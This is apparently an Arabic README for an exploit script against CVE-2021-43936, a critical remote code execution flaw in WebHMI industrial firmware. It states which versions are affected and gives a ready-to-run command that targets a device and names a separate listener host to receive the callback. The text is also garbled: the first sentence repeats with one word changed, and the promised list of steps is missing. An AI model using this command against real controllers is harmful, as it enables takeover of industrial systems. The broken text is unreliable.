
CVE-2021-43936 هي ثغرة أمنية حرجة (CVSS3 10.0) تؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE) في برنامج WebHMI الثابت.
CVE-2021-43936 هي ثغرة أمنية خطيرة (CVSS3 10.0) تؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE) في برنامج WebHMI الثابت.
تعمل هذه الثغرة على الإصدار 4.0 والإصدارات الأحدث.
تم اختبارها فقط على الإصدار 4.0.7475. يتم استخدام الثغرة بواسطة السكريبت في الخطوات التالية:
قد يفشل الاستغلال إذا كان هناك أكثر من بطاقة شبكة (NIC) متصلة. الحل هو المحاولة مرة أخرى.
python3 cve-2021-43936.py -t 10.100.23.200 -p 80 -l 10.100.23.201 -P 80
